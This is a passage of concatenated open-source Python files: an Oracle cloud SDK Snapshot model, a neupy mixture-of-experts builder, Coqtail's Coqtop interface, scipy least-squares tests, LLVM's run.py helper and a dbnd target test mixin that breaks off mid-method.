__ https://tools.ietf.org/rfc/rfc3339
:param time_created: The time_created of this Snapshot.
:type: datetime
"""
self._time_created = time_created
@property
def provenance_id(self):
"""
Gets the provenance_id of this Snapshot.
An `OCID`__ identifying the parent from which this snapshot was cloned.
If this snapshot was not cloned, then the `provenanceId` is the same as the snapshot `id` value.
If this snapshot was cloned, then the `provenanceId` value is the parent's `provenanceId`.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:return: The provenance_id of this Snapshot.
:rtype: str
"""
return self._provenance_id
@provenance_id.setter
def provenance_id(self, provenance_id):
"""
Sets the provenance_id of this Snapshot.
An `OCID`__ identifying the parent from which this snapshot was cloned.
If this snapshot was not cloned, then the `provenanceId` is the same as the snapshot `id` value.
If this snapshot was cloned, then the `provenanceId` value is the parent's `provenanceId`.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:param provenance_id: The provenance_id of this Snapshot.
:type: str
"""
self._provenance_id = provenance_id
@property
def is_clone_source(self):
"""
Gets the is_clone_source of this Snapshot.
Specifies whether the snapshot has been cloned.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:return: The is_clone_source of this Snapshot.
:rtype: bool
"""
return self._is_clone_source
@is_clone_source.setter
def is_clone_source(self, is_clone_source):
"""
Sets the is_clone_source of this Snapshot.
Specifies whether the snapshot has been cloned.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:param is_clone_source: The is_clone_source of this Snapshot.
:type: bool
"""
self._is_clone_source = is_clone_source
@property
def lifecycle_details(self):
"""
Gets the lifecycle_details of this Snapshot.
Additional information about the current 'lifecycleState'.
:return: The lifecycle_details of this Snapshot.
:rtype: str
"""
return self._lifecycle_details
@lifecycle_details.setter
def lifecycle_details(self, lifecycle_details):
"""
Sets the lifecycle_details of this Snapshot.
Additional information about the current 'lifecycleState'.
:param lifecycle_details: The lifecycle_details of this Snapshot.
:type: str
"""
self._lifecycle_details = lifecycle_details
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this Snapshot.
Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this Snapshot.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this Snapshot.
Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this Snapshot.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this Snapshot.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this Snapshot.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this Snapshot.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this Snapshot.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
neupy/architectures/mixture_of_experts.py
|
FrostByte266/neupy
| 801 |
67333
|
import tensorflow as tf
from neupy import layers
from neupy.utils import tf_utils, as_tuple
from neupy.layers.base import BaseGraph
__all__ = ('mixture_of_experts',)
def check_if_network_is_valid(network, index):
if not isinstance(network, BaseGraph):
raise TypeError(
"Invalid input, Mixture of experts expects networks/layers"
"in the list of networks, got `{}` instance instead"
"".format(type(network)))
if len(network.input_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to process single "
"input tensor. Network #{} (0-based indices) has more than one "
"input layer. Input layers: {}"
"".format(index, network.output_layers))
if len(network.output_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to output single "
"tensor. Network #{} (0-based indices) has more than one output "
"layer. Output layers: {}".format(index, network.output_layers))
if network.input_shape.ndims != 2:
raise ValueError(
"Each network from the mixture of experts has to process "
"only 2-dimensional inputs. Network #{} (0-based indices) "
"processes only {}-dimensional inputs. Input layer's shape: {}"
"".format(index, network.input_shape.ndims, network.input_shape))
def check_if_networks_compatible(networks):
input_shapes = []
output_shapes = []
for i, network in enumerate(networks):
input_shapes.append(network.input_shape)
output_shapes.append(network.output_shape)
for shape in input_shapes:
if not shape.is_compatible_with(input_shapes[0]):
raise ValueError(
"Networks have incompatible input shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(input_shapes)))
for shape in output_shapes:
if not shape.is_compatible_with(output_shapes[0]):
raise ValueError(
"Networks have incompatible output shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(output_shapes)))
def mixture_of_experts(networks, gating_layer=None):
"""
Generates mixture of experts architecture from the set of
networks that has the same input and output shapes.
    Mixture of experts learns how to mix results from different
    networks in order to get better performance. It adds a gating layer
    that, using the input data, tries to figure out which of the networks
    will make a better contribution to the final result. The final result
    mixes outputs from all networks using different weights. The higher the
    weight, the larger the contribution from the individual network.
Parameters
----------
networks : list of networks/layers
gating_layer : None or layer
        In case the value is equal to `None`, the following layer
        will be created.
.. code-block:: python
gating_layer = layers.Softmax(len(networks))
Output from the gating layer should be 1D and equal to
the number of networks.
Raises
------
ValueError
        In case there is some problem with the input networks
        or the custom gating layer.
Returns
-------
network
        Mixture of experts network that combines all networks into
        a single one and adds a gating layer to it.
Examples
--------
>>> from neupy import algorithms, architectures
>>> from neupy.layers import *
>>>
>>> network = architectures.mixture_of_experts([
... join(
... Input(10),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(33),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(12),
... Relu(25),
... Relu(5),
... ),
... ])
>>> network
(?, 10) -> [... 12 layers ...] -> (?, 5)
>>>
>>> optimizer = algorithms.Momentum(network, step=0.1)
"""
if not isinstance(networks, (list, tuple)):
raise ValueError("Networks should be specified as a list")
for index, network in enumerate(networks):
check_if_network_is_valid(network, index)
check_if_networks_compatible(networks)
input_shape = tf.TensorShape(None)
for network in networks:
input_shape = input_shape.merge_with(network.input_shape)
n_layers_to_combine = len(networks)
n_features = input_shape[1].value
if n_features is None:
raise ValueError(
"Cannot create mixture of experts model, because "
"number of input features is unknown")
if gating_layer is None:
gating_layer = layers.Softmax(n_layers_to_combine)
if not isinstance(gating_layer, layers.BaseLayer):
raise ValueError(
"Invalid type for gating layer. Type: {}"
"".format(type(gating_layer)))
return layers.join(
layers.Input(n_features),
# Note: Gating network should be specified
# as a first parameter.
layers.parallel(*as_tuple(gating_layer, networks)),
layers.GatedAverage(),
)
|
python/coqtop.py
|
Lysxia/Coqtail
| 160 |
67334
|
# -*- coding: utf8 -*-
# Author: <NAME>
"""Coqtop interface with functions to send commands and parse responses."""
import datetime
import logging
import signal
import subprocess
import threading
import time
from concurrent import futures
from queue import Empty, Queue
from tempfile import NamedTemporaryFile
from typing import (
IO,
TYPE_CHECKING,
Any,
Iterable,
Iterator,
List,
Mapping,
Optional,
Tuple,
Union,
)
from xmlInterface import (
TIMEOUT_ERR,
UNEXPECTED_ERR,
Err,
FindCoqtopError,
Goals,
Ok,
Result,
XMLInterface,
XMLInterfaceBase,
partition_warnings,
prettyxml,
)
if TYPE_CHECKING:
# pylint: disable=unsubscriptable-object
from typing_extensions import TypedDict
BytesQueue = Queue[bytes]
CoqtopProcess = subprocess.Popen[bytes]
VersionInfo = TypedDict(
"VersionInfo",
{
"version": Tuple[int, int, int],
"str_version": str,
"latest": Optional[str],
},
)
else:
BytesQueue = Queue
CoqtopProcess = subprocess.Popen
VersionInfo = Mapping[str, Any]
class CoqtopError(Exception):
"""An exception for when Coqtop stops unexpectedly."""
class Coqtop:
"""Provide an interface to the background Coqtop process."""
def __init__(self) -> None:
"""Initialize Coqtop state.
coqtop - The Coqtop process
states - A stack of previous state_ids (grows to the right)
state_id - The current state_id
root_state - The starting state_id
out_q - A thread-safe queue of data read from Coqtop
err_q - A thread-safe queue of error messages read from Coqtop
xml - The XML interface for the given version
"""
self.coqtop: Optional[CoqtopProcess] = None
self.xml: Optional[XMLInterfaceBase] = None
self.states: List[int] = []
self.state_id = -1
self.root_state = -1
self.out_q: BytesQueue = Queue()
self.err_q: BytesQueue = Queue()
self.stopping = False
# Debugging
self.log: Optional[IO[str]] = None
self.handler: logging.Handler = logging.NullHandler()
self.logger = logging.getLogger(str(id(self)))
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.INFO)
# Coqtop Interface #
def start(
self,
coq_path: Optional[str],
coq_prog: Optional[str],
filename: str,
args: Iterable[str],
timeout: Optional[int] = None,
) -> Tuple[Union[VersionInfo, str], str]:
"""Launch the Coqtop process."""
assert self.coqtop is None
try:
self.logger.debug("start")
self.xml, latest = XMLInterface(coq_path, coq_prog)
launch = self.xml.launch(filename, args)
self.logger.debug(launch)
self.coqtop = subprocess.Popen( # pylint: disable=consider-using-with
launch,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
)
# Ensure that Coqtop spawned correctly
try:
self.coqtop.wait(timeout=0.1)
assert self.coqtop.stderr is not None
return self.coqtop.stderr.read().decode("utf8"), ""
except subprocess.TimeoutExpired:
pass
# Spawn threads to monitor Coqtop's stdout and stderr
for buf, stream in (
(self.out_q, self.coqtop.stdout),
(self.err_q, self.coqtop.stderr),
):
threading.Thread(
target=self.capture_out,
args=(buf, stream),
daemon=True,
).start()
threading.Thread(target=self.capture_dead, daemon=True).start()
# Initialize Coqtop
response, err = self.call(self.xml.init(), timeout=timeout)
if isinstance(response, Err):
return response.msg, err
self.root_state = response.val
self.state_id = response.val
return (
{
"version": self.xml.version,
"str_version": self.xml.str_version,
"latest": latest,
},
err,
)
except (OSError, FindCoqtopError) as e:
# Failed to launch or find Coqtop
self.coqtop = None
return str(e), ""
def stop(self) -> None:
"""End the Coqtop process."""
if self.coqtop is not None:
self.logger.debug("stop")
self.stopping = True
try:
# Try to terminate Coqtop cleanly
# TODO: use Quit call
self.coqtop.terminate()
self.coqtop.communicate()
except (OSError, ValueError, AttributeError):
try:
# Force Coqtop to stop
self.coqtop.kill()
except (OSError, AttributeError):
pass
self.coqtop = None
# Close debugging log
try:
self.handler.flush()
self.handler.close()
except ValueError:
pass
if self.log is not None and not self.log.closed:
self.log.close()
def advance(
self,
cmd: str,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Advance Coqtop by sending 'cmd'."""
assert self.xml is not None
self.logger.debug("advance: %s", cmd)
response, err1 = self.call(
self.xml.add(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Err):
return False, response.msg, response.loc, err1
# In addition to sending 'cmd', also check status in order to force it
# to be evaluated
status, err2 = self.call(self.xml.status(encoding=encoding), timeout=timeout)
# Combine messages
msgs = "\n\n".join(
msg
for msg in (response.msg, response.val["res_msg"], status.msg)
if msg != ""
)
err = err1 + err2
if isinstance(status, Err):
# Reset state id to before the error
self.call(self.xml.edit_at(self.state_id, 1))
return False, msgs, status.loc, err
self.states.append(self.state_id)
self.state_id = response.val["state_id"]
return True, msgs, None, err
def rewind(self, steps: int = 1) -> Tuple[bool, str, Optional[int], str]:
"""Go back 'steps' states."""
assert self.xml is not None
self.logger.debug("rewind: %d", steps)
if steps > len(self.states):
self.state_id = self.root_state
self.states = []
steps = len(self.states)
else:
# In 8.4 query and option commands will be recorded with
# state_id = -1. Need to count them and reduce number of steps to
# rewind so Coqtop doesn't go too far back
fake_steps = sum(s == -1 for s in self.states[-steps:])
if self.states[-steps] != -1:
self.state_id = self.states[-steps]
else:
self.state_id = 0
self.states = self.states[:-steps]
steps -= fake_steps
response, err = self.call(self.xml.edit_at(self.state_id, steps))
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def query(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Query Coqtop with 'cmd'."""
assert self.xml is not None
self.logger.debug("query: %s", cmd)
response, err = self.call(
self.xml.query(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok) and in_script:
# If the query was called from within the script we need to record
# the state id so rewinding will work properly. Since 8.4 uses
# number of steps rather than state ids, record '-1' to indicate
# that no rewind should actually be done
if self.xml.version >= (8, 5, 0):
self.states.append(self.state_id)
else:
self.states.append(-1)
return (
isinstance(response, Ok),
response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def goals(
self,
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Goals], str]:
"""Get the current set of hypotheses and goals."""
assert self.xml is not None
self.logger.debug("goals")
response, err = self.call(self.xml.goal(), timeout=timeout)
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def do_option(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Set or get an option."""
assert self.xml is not None
self.logger.debug("do_option: %s", cmd)
vals, opt = self.xml.parse_option(cmd)
if vals is None:
response, err = self.call(
self.xml.get_options(encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok):
optval = [
(val, desc) for name, desc, val in response.val if name == opt
]
if optval != []:
ret = f"{optval[0][1]}: {optval[0][0]}"
else:
ret = "Invalid option name"
else:
errs = []
for val in vals:
response, err = self.call(
self.xml.set_options(opt, val, encoding=encoding),
timeout=timeout,
)
ret = response.msg
errs.append(err)
if isinstance(response, Ok):
break
err = "".join(errs)
        if isinstance(response, Ok) and in_script:
            # Hack to associate setting an option with a new state id by
            # executing a noop so it works correctly with rewinding
            success, _, _, _ = self.advance(self.xml.noop, encoding)
            assert success
return (
isinstance(response, Ok),
ret if isinstance(response, Ok) else response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def dispatch(
self,
cmd: str,
cmd_no_comment: Optional[str] = None,
in_script: bool = True,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Decide whether 'cmd' is setting/getting an option, a query, or a
regular command.
"""
# pylint: disable=no-else-return
assert self.xml is not None
if cmd_no_comment is None:
cmd_no_comment = cmd
if self.xml.is_option(cmd_no_comment):
return self.do_option(cmd_no_comment, in_script, encoding, timeout)
elif self.xml.is_query(cmd_no_comment):
return self.query(cmd, in_script, encoding, timeout)
elif in_script:
return self.advance(cmd, encoding, timeout)
else:
return True, "Command only allowed in script.", None, ""
# Interacting with Coqtop #
def call(
self,
cmdtype_msg: Tuple[str, Optional[bytes]],
timeout: Optional[int] = None,
) -> Tuple[Result, str]:
"""Send 'msg' to the Coqtop process and wait for the response."""
assert self.xml is not None
# Check if Coqtop has stopped
if not self.running():
raise CoqtopError("Coqtop is not running.")
# Throw away any unread messages
self.empty_out()
# 'msg' can be None if a command does not exist for a particular
# version and is being faked.
# NOTE: It is important that the '_standardize' function being called
# does not depend on the value it is passed since it is None
cmd, msg = cmdtype_msg
if msg is None:
return self.xml.standardize(cmd, Ok(None)), self.collect_err()
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(msg))
self.send_cmd(msg)
with futures.ThreadPoolExecutor(1) as pool:
try:
timeout = timeout if timeout != 0 else None
response, err = pool.submit(self.get_answer).result(timeout)
except futures.TimeoutError:
self.interrupt()
response, err = TIMEOUT_ERR, ""
return self.xml.standardize(cmd, response), err
def get_answer(self) -> Tuple[Result, str]:
"""Read from 'out_q' and wait until a full response is received."""
assert self.xml is not None
data = []
poll_sec = 1
while True:
# Abort if an error is printed to stderr, but ignore warnings.
# NOTE: If `warnings_wf` is False because this version of Coq does
# not follow the pattern expected by `partition_warnings` then
# pretend everything is a warning and hope for the best.
err = self.collect_err()
if self.xml.warnings_wf and partition_warnings(err)[1] != "":
return UNEXPECTED_ERR, err
try:
data.append(self.out_q.get(timeout=poll_sec))
except Empty:
continue
xml = b"".join(data)
if not self.xml.worth_parsing(xml):
continue
response = self.xml.raw_response(xml)
if response is None:
continue
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(b"<response>" + xml + b"</response>"))
return response, err
@staticmethod
def drain_queue(q: BytesQueue) -> Iterator[bytes]:
"""Yield data from 'q' until it is empty."""
while not q.empty():
try:
yield q.get_nowait()
except Empty:
return
def empty_out(self) -> None:
"""Pop data until 'out_q' is empty."""
for _ in Coqtop.drain_queue(self.out_q):
pass
def collect_err(self) -> str:
"""Pop and concatenate everything in 'err_q'."""
err = b"".join(Coqtop.drain_queue(self.err_q)).decode("utf-8")
if err != "":
self.logger.debug(err)
return err
def capture_out(self, buffer: BytesQueue, stream: IO[bytes]) -> None:
"""Continually read data from 'stream' into 'buffer'."""
while not self.stopping:
try:
buffer.put(stream.read(0x10000))
except (AttributeError, OSError, ValueError):
# Coqtop died
return
def capture_dead(self) -> None:
"""Continually check if Coqtop has died."""
while self.running():
time.sleep(1)
self.stop()
def send_cmd(self, cmd: bytes) -> None:
"""Write to Coqtop's stdin."""
if self.coqtop is None:
raise CoqtopError("coqtop must not be None in send_cmd()")
if self.coqtop.stdin is None:
raise CoqtopError("coqtop stdin must not be None in send_cmd()")
self.coqtop.stdin.write(cmd)
self.coqtop.stdin.flush()
def interrupt(self) -> None:
"""Send a SIGINT signal to Coqtop."""
if self.coqtop is None:
raise CoqtopError("Coqtop is not running.")
self.coqtop.send_signal(signal.SIGINT)
# Current State #
def running(self) -> bool:
"""Check if Coqtop has already been started."""
return self.coqtop is not None and self.coqtop.poll() is None
# Debugging #
def toggle_debug(self) -> Optional[str]:
"""Enable or disable logging of debug messages."""
self.logger.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
if self.log is None:
# Create unique log file
fmt = logging.Formatter("%(asctime)s: %(message)s")
self.log = NamedTemporaryFile( # pylint: disable=consider-using-with
mode="w",
prefix=f"coqtop_{datetime.datetime.now().strftime('%y%m%d_%H%M%S')}_",
delete=False,
)
self.handler = logging.StreamHandler(self.log)
self.handler.setFormatter(fmt)
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.DEBUG)
else:
# Clean up old logging
self.log.close()
# Set to null logging
self.log = None
self.handler = logging.NullHandler()
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.CRITICAL)
return self.log.name if self.log is not None else None
|
edafa/ClassPredictor.py
|
andrewekhalel/tf_predictor
| 134 |
67353
|
<reponame>andrewekhalel/tf_predictor<gh_stars>100-1000
from .BasePredictor import BasePredictor
from .exceptions import UnsupportedDataType
import numpy as np
class ClassPredictor(BasePredictor):
def __init__(self,conf):
"""
Initialize class
:param conf: configuration (json string or file path)
"""
super().__init__(conf=conf)
def reverse_aug(self,aug_patch):
"""
		Reverse the applied augmentations and calculate their combined mean
		:param aug_patch: set of predictions of the model for different augmentations
		:returns: single combined patch
"""
if isinstance(aug_patch,np.ndarray):
if self.mean == "ARITH":
return np.mean(aug_patch,axis=0)
elif self.mean == "GEO":
product = np.prod(aug_patch,axis=0)
return product ** (1./len(self.augs))
elif isinstance(aug_patch,list):
try:
aug_patch = np.array(aug_patch)
return np.mean(aug_patch,axis=0)
			except Exception:
averaged = []
for output in aug_patch:
averaged.append([sum(e)/len(e) for e in zip(*output)])
return averaged
else:
			raise UnsupportedDataType(
				'Data type "%s" produced by your model is not supported. '
				'list and numpy arrays are the only supported types.' % type(aug_patch))
def _predict_single(self,img):
"""
predict single image
:param img: image to predict
:return: prediction on the image
"""
aug_patches = self.apply_aug(img)
pred = self.predict_patches(aug_patches)
return self.reverse_aug(pred)
|
lib/python2.7/site-packages/scipy/optimize/tests/test_lsq_linear.py
|
wfehrnstrom/harmonize
| 6,989 |
67356
|
import numpy as np
from numpy.linalg import lstsq
from numpy.testing import (assert_allclose, assert_equal, assert_,
run_module_suite, assert_raises)
from scipy.sparse import rand
from scipy.sparse.linalg import aslinearoperator
from scipy.optimize import lsq_linear
A = np.array([
[0.171, -0.057],
[-0.049, -0.248],
[-0.166, 0.054],
])
b = np.array([0.074, 1.014, -0.383])
class BaseMixin(object):
def __init__(self):
self.rnd = np.random.RandomState(0)
def test_dense_no_bounds(self):
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, method=self.method, lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
def test_dense_bounds(self):
# Solutions for comparison are taken from MATLAB.
lb = np.array([-1, -10])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
lb = np.array([0.0, -np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.0, -4.084174437334673]),
atol=1e-6)
lb = np.array([-1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.448427311733504, 0]),
atol=1e-15)
ub = np.array([np.inf, -5])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-0.105560998682388, -5]))
ub = np.array([-1, np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-1, -4.181102129483254]))
lb = np.array([0, -4])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.005236663400791, -4]))
def test_dense_rank_deficient(self):
A = np.array([[-0.307, -0.184]])
b = np.array([0.773])
lb = [-0.1, -0.1]
ub = [0.1, 0.1]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, [-0.1, -0.1])
A = np.array([
[0.334, 0.668],
[-0.516, -1.032],
[0.192, 0.384],
])
b = np.array([-1.436, 0.135, 0.909])
lb = [0, -1]
ub = [1, -0.5]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.optimality, 0, atol=1e-11)
def test_full_result(self):
lb = np.array([0, -4])
ub = np.array([1, 0])
res = lsq_linear(A, b, (lb, ub), method=self.method)
assert_allclose(res.x, [0.005236663400791, -4])
r = A.dot(res.x) - b
assert_allclose(res.cost, 0.5 * np.dot(r, r))
assert_allclose(res.fun, r)
assert_allclose(res.optimality, 0.0, atol=1e-12)
assert_equal(res.active_mask, [0, -1])
assert_(res.nit < 15)
assert_(res.status == 1 or res.status == 3)
assert_(isinstance(res.message, str))
assert_(res.success)
class SparseMixin(object):
def test_sparse_and_LinearOperator(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
A = aslinearoperator(A)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
def test_sparse_bounds(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
lb = self.rnd.randn(n)
ub = lb + 1
res = lsq_linear(A, b, (lb, ub))
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol=1e-13)
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol='auto')
assert_allclose(res.optimality, 0.0, atol=1e-8)
class TestTRF(BaseMixin, SparseMixin):
method = 'trf'
lsq_solvers = ['exact', 'lsmr']
class TestBVLS(BaseMixin):
method = 'bvls'
lsq_solvers = ['exact']
if __name__ == '__main__':
run_module_suite()
|
courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tagme/admin.py
|
Nahid-Hassan/fullstack-software-development
| 297 |
67369
|
<gh_stars>100-1000
from django.contrib import admin
# Register your models here.
from tagme.models import Forum, Comment
admin.site.register(Forum)
admin.site.register(Comment)
|
libcxx/utils/run.py
|
mkinsner/llvm
| 2,338 |
67390
|
<gh_stars>1000+
#!/usr/bin/env python
#===----------------------------------------------------------------------===##
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===----------------------------------------------------------------------===##
"""run.py is a utility for running a program.
It can perform code signing, forward arguments to the program, and return the
program's error code.
"""
import argparse
import os
import platform
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--execdir', type=str, required=True)
parser.add_argument('--codesign_identity', type=str, required=False, default=None)
parser.add_argument('--env', type=str, nargs='*', required=False, default=dict())
parser.add_argument("command", nargs=argparse.ONE_OR_MORE)
args = parser.parse_args()
commandLine = args.command
# HACK:
# If an argument is a file that ends in `.tmp.exe`, assume it is the name
# of an executable generated by a test file. We call these test-executables
# below. This allows us to do custom processing like codesigning test-executables.
# It's also possible for there to be no such executable, for example in the case
# of a .sh.cpp test.
isTestExe = lambda exe: exe.endswith('.tmp.exe') and os.path.exists(exe)
# Do any necessary codesigning of test-executables found in the command line.
if args.codesign_identity:
for exe in filter(isTestExe, commandLine):
subprocess.check_call(['xcrun', 'codesign', '-f', '-s', args.codesign_identity, exe], env={})
# Extract environment variables into a dictionary
env = {k : v for (k, v) in map(lambda s: s.split('=', 1), args.env)}
if platform.system() == 'Windows':
# Pass some extra variables through on Windows:
# COMSPEC is needed for running subprocesses via std::system().
if 'COMSPEC' in os.environ:
env['COMSPEC'] = os.environ.get('COMSPEC')
# TEMP is needed for placing temp files in a sensible directory.
if 'TEMP' in os.environ:
env['TEMP'] = os.environ.get('TEMP')
# Run the command line with the given environment in the execution directory.
return subprocess.call(commandLine, cwd=args.execdir, env=env, shell=False)
if __name__ == '__main__':
exit(main())
|
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/targets/base_target_test_mixin.py
|
ipattarapong/dbnd
| 224 |
67415
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import abc
import os
import random
import pandas as pd
import pytest
from pandas.util.testing import assert_frame_equal
from pytest import fixture
import targets
import targets.errors
import targets.pipes
from dbnd.testing.helpers_pytest import skip_on_windows
from targets import DataTarget, target
class TestException(Exception):
pass
class FileTargetTestMixin(object):
"""All Target that take bytes (python2: str) should pass those
tests. In addition, a test to verify the method `exists`should be added
"""
@fixture(autouse=True)
def _current_request(self, request):
self._current_request = request
self._id = request.node.name
def assertCleanUp(self, tmp_path=""):
pass
@abc.abstractmethod
def create_target(self, io_pipe=None):
# type: (...)->DataTarget
pass
def test_atomicity(self):
target = self.create_target()
fobj = target.open("w")
assert not target.exists()
fobj.close()
assert target.exists()
def test_readback(self):
target = self.create_target()
origdata = "lol\n"
fobj = target.open("w")
fobj.write(origdata)
fobj.close()
fobj = target.open("r")
data = fobj.read()
assert origdata == data
def test_unicode_obj(self):
target = self.create_target()
origdata = u"lol\n"
fobj = target.open("w")
fobj.write(origdata)
fobj.close()
fobj = target.open("r")
data = fobj.read()
assert origdata == data
def test_with_close(self):
target = self.create_target()
with target.open("w") as fobj:
tp = getattr(fobj, "tmp_path", "")
fobj.write("hej\n")
self.assertCleanUp(tp)
assert target.exists()
def test_with_exception(self):
target = self.create_target()
a = {}
def foo():
with target.open("w") as fobj:
fobj.write("hej\n")
a["tp"] = getattr(fobj, "tmp_path", "")
raise TestException("Test triggered exception")
with pytest.raises(TestException):
foo()
self.assertCleanUp(a["tp"])
assert not target.exists()
def test_del(self):
t = self.create_target()
p = t.open("w")
print("test", file=p)
tp = getattr(p, "tmp_path", "")
del p
self.assertCleanUp(tp)
assert not t.exists()
def test_write_cleanup_no_close(self):
t = self.create_target()
def context():
f = t.open("w")
f.write("stuff")
return getattr(f, "tmp_path", "")
tp = context()
import gc
gc.collect() # force garbage collection of f variable
self.assertCleanUp(tp)
assert not t.exists()
def test_text(self):
t = self.create_target(targets.pipes.UTF8)
a = u"我éçф"
with t.open("w") as f:
f.write(a)
with t.open("r") as f:
b = f.read()
assert a == b
def test_del_with_Text(self):
t = self.create_target(targets.pipes.UTF8)
p = t.open("w")
print(u"test", file=p)
tp = getattr(p, "tmp_path", "")
del p
self.assertCleanUp(tp)
assert not t.exists()
def test_format_injection(self):
class CustomFormat(targets.pipes.IOPipeline):
def pipe_reader(self, input_pipe):
input_pipe.foo = "custom read property"
return input_pipe
def pipe_writer(self, output_pipe):
